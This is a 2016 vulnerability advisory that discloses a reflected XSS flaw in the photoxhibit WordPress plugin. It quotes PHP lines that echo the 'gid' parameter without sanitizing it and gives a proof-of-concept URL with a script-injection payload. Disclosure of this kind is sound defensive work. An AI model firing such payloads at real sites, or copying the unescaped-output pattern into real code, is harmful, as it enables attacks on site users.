Advisory #: 780
Title: Reflected XSS in wordpress plugin photoxhibit v2.1.8
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site:
Downloads: 34643
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact:
Plugin Name: photoxhibit
There is a reflected XSS vulnerability in the following php code ./photoxhibit/common/inc/pages/build.php: 11: <a class="editLinks" href="admin.php?page=px_manage&amp;action=edit_styles&amp;gid=<?php echo $_GET['gid'];?>"><?php _e('Edit Styles', 'photoxhibit'); ?></a> 13: <a class="editLinks" href="admin.php?page=px_manage&amp;action=edit_image_attr&amp;gid=<?php echo $_GET['gid'];?>"><?php _e('Edit Images', 'photoxhibit'); ?></a> 24: <input type="hidden" id="px_gidHidden" name="px_gidHidden" value="<?php echo $_GET['gid'];?>"/> The variable gid appears to send unsanitized data back to the users browser.
CVE-ID: 2016-1000143
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"